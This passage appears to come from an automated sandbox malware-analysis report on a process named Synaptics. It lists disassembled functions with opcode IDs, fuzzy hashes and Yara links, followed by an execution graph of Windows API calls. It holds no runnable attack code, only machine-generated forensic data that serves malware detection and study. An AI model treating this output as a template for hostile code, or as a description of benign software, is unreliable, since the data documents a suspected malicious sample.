                                                    Uniqueness Score: -1.00%

                                                    Function 06066300 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8ac5ae2f89d484bb0b8b848bb4f425fedc43a3c6857225da85b75f66efaf293
                                                    • Instruction ID: f9561bf6330cc63d5365d9441289b4e4aa03e6d0ec047672cdbd27ddb25f5bab
                                                    • Opcode Fuzzy Hash: c8ac5ae2f89d484bb0b8b848bb4f425fedc43a3c6857225da85b75f66efaf293
                                                    • Instruction Fuzzy Hash: D61153B5A002028FD788CF29C488B5ABBF5FF98348F1480A8E505CB361CB32DC84CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606EB48 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8562e54d247ff2395f9bad0bc9deae9d66b957d90c29dc9d36a9ed5bbcca49a9
                                                    • Instruction ID: 8ecebd1c6ea1690d4f1212da3df397610ce4c60f0bb987449362993d5948f96d
                                                    • Opcode Fuzzy Hash: 8562e54d247ff2395f9bad0bc9deae9d66b957d90c29dc9d36a9ed5bbcca49a9
                                                    • Instruction Fuzzy Hash: 6701FF36344A049FC764CA6ED885D1AFBF9FF896207140A69F15AC7761CA21EC428B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06068518 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cca97dd6778a107a7edfb2bfb9fabc504de00f5fde2b60a70103c49dc763d36f
                                                    • Instruction ID: e48758d69679c8db828efc83ef2cd397d1ae8651e6f289e9ef0512f0c82428d2
                                                    • Opcode Fuzzy Hash: cca97dd6778a107a7edfb2bfb9fabc504de00f5fde2b60a70103c49dc763d36f
                                                    • Instruction Fuzzy Hash: C2F0B432B542118FDB88DFA9B4444AE7BF9EB4416571480BBF00EC7650EE31D980CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06069450 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 525a929a3be54159759d8441eb274664569c6f8149958a05f55f0e3e3d65ffc9
                                                    • Instruction ID: 36f83ff95e89a84f2b4e6ee4d717546b4ac4a45fd5f2996cd3b0b306eecea4e0
                                                    • Opcode Fuzzy Hash: 525a929a3be54159759d8441eb274664569c6f8149958a05f55f0e3e3d65ffc9
                                                    • Instruction Fuzzy Hash: B2F0F632B441595FC7608B4AD484D4BFFA9AB84321B168156E52A8B655CB71FC00C7D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06061DE8 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5620e57bb2bbd5e231425664df80017e74a29fcaa6281db0cf9520a93212bc8d
                                                    • Instruction ID: 07d761329ccf8346dc0660c7503946d65bd01de68b24f6f6d221727f8dce2a15
                                                    • Opcode Fuzzy Hash: 5620e57bb2bbd5e231425664df80017e74a29fcaa6281db0cf9520a93212bc8d
                                                    • Instruction Fuzzy Hash: 11F0E5322082506FD3B4466BAC85B677FECDF855A1F1844BAF089C3680E535D502CA60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06066360 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 180649386dc0b7d8d7218fdfe0280edcf1231b4cf7486370608d7bbb24e4ee15
                                                    • Instruction ID: 219159e60dea267904b206b5d30a54a35b518a3ab61f696889dac8c002b9fa1a
                                                    • Opcode Fuzzy Hash: 180649386dc0b7d8d7218fdfe0280edcf1231b4cf7486370608d7bbb24e4ee15
                                                    • Instruction Fuzzy Hash: CDF0A0393013109FC3258A3AA8848137BBAEFC9325320557DF94AC7302DE32EC05CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06068588 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a546195d93021b9a9dcd2b4b6450c32d10fb80eaa836c4afb35ecd6c52055e2
                                                    • Instruction ID: ec51ba711ae55df016f1ecfa2f50fcf851372cd866321d8a9dc10599a045ccef
                                                    • Opcode Fuzzy Hash: 7a546195d93021b9a9dcd2b4b6450c32d10fb80eaa836c4afb35ecd6c52055e2
                                                    • Instruction Fuzzy Hash: 8DE0D820B193904FCB1723F4542906D3FEB8FC7905795489BD10ADB791DE588C4ACBE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06069410 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb7f12b42c657421349ef84f0680bed053f9ead5f8473adb8da42f21251ba80d
                                                    • Instruction ID: ff00aee7ff458fa3f82ca8c84985548d4fd00bd0c1733ce5c59088997120c819
                                                    • Opcode Fuzzy Hash: fb7f12b42c657421349ef84f0680bed053f9ead5f8473adb8da42f21251ba80d
                                                    • Instruction Fuzzy Hash: D9E0C23A716A1507D781099DA98E77AABCBDBCD4657584036F509C3B06DDA4CC074682
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06069420 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e24c37476cf1949a7099e50d3d069f76f040f60681b099bf2fdd59062e99a19
                                                    • Instruction ID: 62e73f236034b61b63b4b228d0cbbc5f1d29db263ec2f4cc5da28a37de854acb
                                                    • Opcode Fuzzy Hash: 4e24c37476cf1949a7099e50d3d069f76f040f60681b099bf2fdd59062e99a19
                                                    • Instruction Fuzzy Hash: ACD0A736725115170794158F78C883BBECFD7DD5B5314003AF50DC3302DDA0CC024691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0F55C Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1ddedd8ef8471fa17d5c4544cae8e93a4cc293e58fd8f4888718b2fd9de27fc
                                                    • Instruction ID: bc5e349d6181d33ea215f7cbb37df8929cd391060e9aa78bbb1b3d77cebc7315
                                                    • Opcode Fuzzy Hash: c1ddedd8ef8471fa17d5c4544cae8e93a4cc293e58fd8f4888718b2fd9de27fc
                                                    • Instruction Fuzzy Hash: 27D05E7A3080086F6A592919ECD9CFF3F2BD7D46F57208012F84586350CE239C529AA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F9A0 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ef90cb788adf08b79ba271f75f208305fbf06a3f4fbfb148a71700e21b500db
                                                    • Instruction ID: b61527792b023c3961b702a8717213f8b20549b9aeff6dabc4763de8e23a8461
                                                    • Opcode Fuzzy Hash: 0ef90cb788adf08b79ba271f75f208305fbf06a3f4fbfb148a71700e21b500db
                                                    • Instruction Fuzzy Hash: 85E0C2363401394B8984F7D5D5148DA3BDEBF8911434106E5D44E5B331DF60AC0147D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606EF4F Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61612c5aa4810dc150ac7685353ba9d7df23386b9c88499dafeb5bef08b79276
                                                    • Instruction ID: b4e264ae175344b47a915fdea69aac019d31a08e1a884e88f6ac4ff1f04d0f3a
                                                    • Opcode Fuzzy Hash: 61612c5aa4810dc150ac7685353ba9d7df23386b9c88499dafeb5bef08b79276
                                                    • Instruction Fuzzy Hash: 32E0CD367042448FC7154F64D4585E77BA5DF9921134485AAE9DA8B71AC6219C41CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06068578 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1112893d1325f68fb10ade0053685ef6ded32e609a71528318664a97d264fbdb
                                                    • Instruction ID: 0912e855903484f983dcd9cfc7394810c3e00bb551775086a5b4629f52259236
                                                    • Opcode Fuzzy Hash: 1112893d1325f68fb10ade0053685ef6ded32e609a71528318664a97d264fbdb
                                                    • Instruction Fuzzy Hash: 2ED0221024E7E50FC31313E93898495BFE98E4746032C80EBE2C8C7113C48C89838BE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B0FCB4 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79dc0169ef11e299060afd4e79af1f9d8736c7cdd197dfc05f641e6f23d1fa7c
                                                    • Instruction ID: f5ca15821124f495a4e7d2ede49589464621ffb0a1eb22bd08f6fd9c90a711e9
                                                    • Opcode Fuzzy Hash: 79dc0169ef11e299060afd4e79af1f9d8736c7cdd197dfc05f641e6f23d1fa7c
                                                    • Instruction Fuzzy Hash: FBD0226224D2C04FC7538228ACD68E1BF30EA030283080AE7E0C8AB083C200A00FC312
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 06068724 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1be4c31fbdca02a8a3dee50fc16d9e9b46aa886f0090c803fc3670cadac99ceb
                                                    • Instruction ID: 5fd78b6d73b11a0150e9dad17abf78e63affec10a221f416d88440e4b892c066
                                                    • Opcode Fuzzy Hash: 1be4c31fbdca02a8a3dee50fc16d9e9b46aa886f0090c803fc3670cadac99ceb
                                                    • Instruction Fuzzy Hash: D8D0C939B40008CF9B44DFAEE0984DD7BB5EF89215B8000A6E21AC7670DF309C15CF82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606898C Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c272cd238054577809ad4fc088f0e5222045fb8fb8fb6948d23b633a562f2a76
                                                    • Instruction ID: 5b7ca383afb37357f9178f70e3ec9434ac41a681e51a9b0d4612dfb8bd768123
                                                    • Opcode Fuzzy Hash: c272cd238054577809ad4fc088f0e5222045fb8fb8fb6948d23b633a562f2a76
                                                    • Instruction Fuzzy Hash: 1ED01235740004CF8744DF99D4584DD77B5DF94215B9000E6E206C7630CB30AC55CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F7B6 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ede3ef72e7a9e1344e79dc7e8e63aae24c24e89e8becbab1b07525936130313e
                                                    • Instruction ID: c2a3cb9bf1a64158b167636ac8844108a9411423025d09802a26eb7fe51153d5
                                                    • Opcode Fuzzy Hash: ede3ef72e7a9e1344e79dc7e8e63aae24c24e89e8becbab1b07525936130313e
                                                    • Instruction Fuzzy Hash: B7C01272A8A18AAFD7594AA1BC092A43BB6AB63206F010182FC09440219A25080ACAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 060693F8 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2545cf98c9d59535abda62b29e1fdd204cf27007b54d96f58eb88fb9a8d083d1
                                                    • Instruction ID: c4b2afcdb0c5f2f7e428d148cec40acd2ed05a7a76a48790e708d244356338d1
                                                    • Opcode Fuzzy Hash: 2545cf98c9d59535abda62b29e1fdd204cf27007b54d96f58eb88fb9a8d083d1
                                                    • Instruction Fuzzy Hash: 59C09270511244CFCB06CF20C0488107B72AF4230A35980D8E0098B622CB32DC82CF00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0606F7CA Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1b2a1f391d087bf9560adc765ef8006e278fa05a23979184c48af0a4ee6843c
                                                    • Instruction ID: fdbcad1c1af0272f034c068025c722c94ca52e6f665dbf6af7dae6586587175a
                                                    • Opcode Fuzzy Hash: a1b2a1f391d087bf9560adc765ef8006e278fa05a23979184c48af0a4ee6843c
                                                    • Instruction Fuzzy Hash: D5A022328CA00ECF0AE88C83B0080383B22F280A233A002C0FC0E000208E030822CEC0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 06066F72 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (Hl$(Hl$t%Dl$t%Dl
                                                    • API String ID: 0-2740908089
                                                    • Opcode ID: 38f065437b8d67917204f43000692df8606b0ecd42e0c2363b834ed5e5aea447
                                                    • Instruction ID: 4058f24badf9e695106b78b6363f84d4f255035484392cfcaee5de4e37ea1171
                                                    • Opcode Fuzzy Hash: 38f065437b8d67917204f43000692df8606b0ecd42e0c2363b834ed5e5aea447
                                                    • Instruction Fuzzy Hash: 75B12934A402058FD7A4CF69C598FA9BBF6EF89318F1584A9E5099B371DB31EC80CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05B03B90 Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: KHl$KHl$KHl$KHl
                                                    • API String ID: 0-1846548151
                                                    • Opcode ID: 5140fcfd3633ff87f838dd754f52940ae7e19cd59a0dd4cfc2149e9e410d9eeb
                                                    • Instruction ID: df5cfd52e57a42f1f64e0ae96556da627b0ab35449ec77736e3f15cf1c0a5d4e
                                                    • Opcode Fuzzy Hash: 5140fcfd3633ff87f838dd754f52940ae7e19cd59a0dd4cfc2149e9e410d9eeb
                                                    • Instruction Fuzzy Hash: 3C2108353042100F9724EB7AA868A7EB6CAFFC55A870444BDD50ECF7A0EF25EC019391
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:4.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:972
                                                    Total number of Limit Nodes:32
                                                    execution_graph 48066 437d70 SetWindowLongA GetWindowLongA 48067 437daf GetWindowLongA 48066->48067 48068 437dcd SetPropA SetPropA 48066->48068 48067->48068 48069 437dbe SetWindowLongA 48067->48069 48072 422ba4 48068->48072 48069->48068 48077 459934 48072->48077 48161 43f118 48072->48161 48177 43eec0 48072->48177 48073 422bba 48078 45999c 48077->48078 48082 45996a 48077->48082 48184 4597e8 48078->48184 48081 4599a7 48083 459a65 48081->48083 48084 4599b7 48081->48084 48082->48078 48157 45998b 48082->48157 48192 41ac6c 48082->48192 48086 459a6c 48083->48086 48087 459abb 48083->48087 48085 459f03 48084->48085 48098 4599bd 48084->48098 48214 45aae4 22 API calls 48085->48214 48089 459a72 48086->48089 48106 459ddb 48086->48106 48094 459f1d 48087->48094 48095 459ac8 48087->48095 48117 459a49 48087->48117 48090 459aa2 48089->48090 48091 459a79 48089->48091 48110 459db9 48090->48110 48090->48117 48090->48157 48107 459a86 48091->48107 48108 459afd 48091->48108 48091->48157 48092 459a31 48099 459fa7 48092->48099 48100 459a37 48092->48100 48093 459a4e 48101 459a57 48093->48101 48102 459b93 48093->48102 48103 459f26 48094->48103 48104 459f3e 48094->48104 48096 459ec4 IsIconic 48095->48096 48097 459ad3 48095->48097 48111 459ed8 GetFocus 48096->48111 48096->48157 48097->48085 48097->48117 48098->48092 48098->48093 48098->48117 48098->48157 48232 4598ac NtdllDefWindowProc_A 48099->48232 48112 459f81 48100->48112 48113 459a40 48100->48113 48114 459ce4 48101->48114 48101->48117 48199 45a038 48102->48199 48215 45a5a4 36 API calls 48103->48215 48216 45a600 67 API calls 48104->48216 48133 459e01 IsWindowEnabled 48106->48133 48106->48157 48107->48117 48118 459c9c SendMessageA 48107->48118 48120 459b0f 48108->48120 48121 459b18 48108->48121 48208 45a47c IsWindowEnabled 48110->48208 48122 459ee9 48111->48122 48111->48157 48217 445ed0 48112->48217 48113->48117 48123 459bc7 48113->48123 48135 459d12 48114->48135 48114->48157 48117->48157 48191 4598ac NtdllDefWindowProc_A 48117->48191 48118->48157 48127 459b25 48120->48127 48128 459b16 48120->48128 48196 45a054 80 API calls 48121->48196 48213 451750 GetCurrentThreadId 733AAC10 48122->48213 48204 4598ac NtdllDefWindowProc_A 48123->48204 48126 459f93 48230 459840 21 API calls 48126->48230 48197 45a104 77 API calls 48127->48197 48198 4598ac NtdllDefWindowProc_A 48128->48198 48132 459bcd 48138 459c0c 48132->48138 48139 459bea 48132->48139 48140 459e0f 48133->48140 48133->48157 48207 40edc4 SetErrorMode LoadLibraryA 48135->48207 48137 459ef0 48144 459ef8 SetFocus 48137->48144 48137->48157 48206 45973c 72 API calls 48138->48206 48205 45974c 67 API calls 48139->48205 48151 459e16 IsWindowVisible 48140->48151 48141 459f9e 48231 4598ac NtdllDefWindowProc_A 48141->48231 48144->48157 48148 459d21 48152 459d70 GetLastError 48148->48152 48153 459d30 GetProcAddress 48148->48153 48149 459bf2 PostMessageA 48149->48157 48150 459c14 PostMessageA 48150->48157 48154 459e24 GetFocus 48151->48154 48151->48157 48152->48157 48155 459d58 48153->48155 48153->48157 48209 441704 48154->48209 48155->48157 48157->48073 48158 459e39 SetFocus 48211 43c130 48158->48211 48162 43f12b 48161->48162 48165 43f143 48161->48165 48163 43f19d 48162->48163 48171 43f12d 48162->48171 48164 43c1fc 160 API calls 48163->48164 48173 43f1a6 48164->48173 48170 43f13e 48165->48170 48315 43f084 68 API calls 48165->48315 48167 43f1da 48167->48073 48168 43f1f7 48168->48170 48175 43f1fb 48168->48175 48170->48167 48304 43c1fc 48170->48304 48171->48170 48172 43f23a GetCapture 48171->48172 48172->48170 48173->48167 48314 43eff0 67 API calls 48173->48314 48175->48167 48176 43f21e NtdllDefWindowProc_A 48175->48176 48176->48167 48183 43f118 163 API calls 48177->48183 48178 43eeef 48358 4399a4 99 API calls 48178->48358 48180 43ef01 48359 428b50 101 API calls 48180->48359 48182 43ef06 48182->48073 48183->48178 48185 4597fb 48184->48185 48186 459815 48185->48186 48187 459806 SetThreadLocale 48185->48187 48189 459825 48185->48189 48186->48189 48234 4587a4 48186->48234 48233 40e2e8 84 API calls 48187->48233 48189->48081 48191->48157 48193 41ac76 48192->48193 48194 41ac8a 48193->48194 48260 41abf8 66 API calls 48193->48260 48194->48082 48196->48157 48197->48157 48198->48157 48261 42b534 48199->48261 48202 45a047 LoadIconA 48203 45a053 48202->48203 48203->48157 48204->48132 48205->48149 48206->48150 48207->48148 48208->48157 48210 44170e 48209->48210 48210->48158 48212 43c14c SetFocus 48211->48212 48212->48157 48213->48137 48214->48155 48215->48155 48216->48155 48218 445edf 48217->48218 48219 445ed8 48217->48219 48276 445e34 48218->48276 48224 445f0a SystemParametersInfoA 48219->48224 48225 445f1b SendMessageA 48219->48225 48228 445edd 48219->48228 48222 445ef5 48280 445e50 SystemParametersInfoA 48222->48280 48223 445eec 48279 445e80 6 API calls 48223->48279 48224->48228 48225->48228 48228->48126 48229 445efc 48229->48126 48230->48141 48231->48157 48232->48157 48233->48186 48236 4587bd 48234->48236 48235 4587ee SystemParametersInfoA 48237 458801 CreateFontIndirectA 48235->48237 48238 458819 GetStockObject 48235->48238 48236->48235 48252 424fcc 48237->48252 48239 424fcc 40 API calls 48238->48239 48241 45882d SystemParametersInfoA 48239->48241 48243 458881 48241->48243 48244 45884d CreateFontIndirectA 48241->48244 48257 4250b0 40 API calls 48243->48257 48245 424fcc 40 API calls 48244->48245 48247 458866 CreateFontIndirectA 48245->48247 48249 424fcc 40 API calls 48247->48249 48248 458891 GetStockObject 48250 424fcc 40 API calls 48248->48250 48251 45887f 48249->48251 48250->48251 48251->48189 48258 424b88 GetObjectA 48252->48258 48254 424fde 48259 424dc0 39 API calls 48254->48259 48256 424fe7 48256->48241 48257->48248 48258->48254 48259->48256 48260->48194 48264 42b570 48261->48264 48265 42b53e 48264->48265 48266 42b580 48264->48266 48265->48202 48265->48203 48266->48265 48273 41d8cc 66 API calls 48266->48273 48268 42b59f 48268->48265 48269 42b5b9 48268->48269 48270 42b5ac 48268->48270 48274 426aa0 72 API calls 48269->48274 48275 425f4c 66 API calls 48270->48275 48273->48268 48274->48265 48275->48265 48281 42c5e4 48276->48281 48279->48228 48280->48229 48282 42c5f4 48281->48282 48285 42c614 48281->48285 48288 42c4fc 48282->48288 48286 42c645 GetSystemMetrics 48285->48286 48287 42c64b 48285->48287 48286->48287 48287->48222 48287->48223 48290 42c512 48288->48290 48289 42c585 48299 4049c0 48289->48299 48290->48289 48292 42c56d 48290->48292 48294 42c4fc 21 API calls 48290->48294 48295 42c575 GetProcAddress 48292->48295 48296 42c557 48294->48296 48295->48289 48296->48292 48297 42c565 48296->48297 48298 4049c0 21 API calls 48297->48298 48298->48292 48300 4049c6 48299->48300 48302 4049e1 KiUserCallbackDispatcher 48299->48302 48300->48302 48303 40277c 21 API calls 48300->48303 48302->48287 48303->48302 48305 43c212 48304->48305 48306 43c2ce 48305->48306 48307 43c258 48305->48307 48309 43c2e9 48305->48309 48310 43c2c3 48305->48310 48322 45b21c 126 API calls 48306->48322 48307->48309 48316 45601c 48307->48316 48309->48167 48310->48307 48311 43c32a GetKeyboardState 48310->48311 48312 43c346 48311->48312 48312->48309 48314->48167 48315->48168 48317 45602b 48316->48317 48323 454a44 48317->48323 48320 45604b 48320->48309 48322->48307 48324 454ad8 48323->48324 48326 454a68 48323->48326 48327 454ae9 48324->48327 48354 44e3bc 82 API calls 48324->48354 48326->48324 48331 458260 66 API calls 48326->48331 48352 406a70 66 API calls 48326->48352 48353 40d180 66 API calls 48326->48353 48328 454b29 48327->48328 48329 454bc1 48327->48329 48336 454b9c 48328->48336 48343 454b44 48328->48343 48330 454bdb 48329->48330 48333 454bd5 SetMenu 48329->48333 48332 454bed 48330->48332 48350 454b9a 48330->48350 48331->48326 48357 45497c 72 API calls 48332->48357 48333->48330 48336->48330 48340 454bb0 48336->48340 48338 454bf4 48339 4049c0 21 API calls 48338->48339 48342 454c09 48339->48342 48344 454bb9 SetMenu 48340->48344 48342->48320 48351 455f20 10 API calls 48342->48351 48343->48330 48345 454b67 GetMenu 48343->48345 48344->48330 48346 454b71 48345->48346 48347 454b8a 48345->48347 48349 454b84 SetMenu 48346->48349 48355 44e3bc 82 API calls 48347->48355 48349->48347 48350->48330 48356 455b08 74 API calls 48350->48356 48351->48320 48352->48326 48353->48326 48354->48327 48355->48350 48356->48332 48357->48338 48358->48180 48359->48182 48360 45f1c0 48372 417608 66 API calls 48360->48372 48362 45f1f2 48363 45f1f6 48362->48363 48364 45f1ff 48362->48364 48373 45d2f8 SHGetSpecialFolderLocation 48363->48373 48374 45d3f8 35 API calls 48364->48374 48367 45f209 48375 45d324 8 API calls 48367->48375 48369 45f1fb 48370 4049c0 21 API calls 48369->48370 48371 45f23e 48370->48371 48372->48362 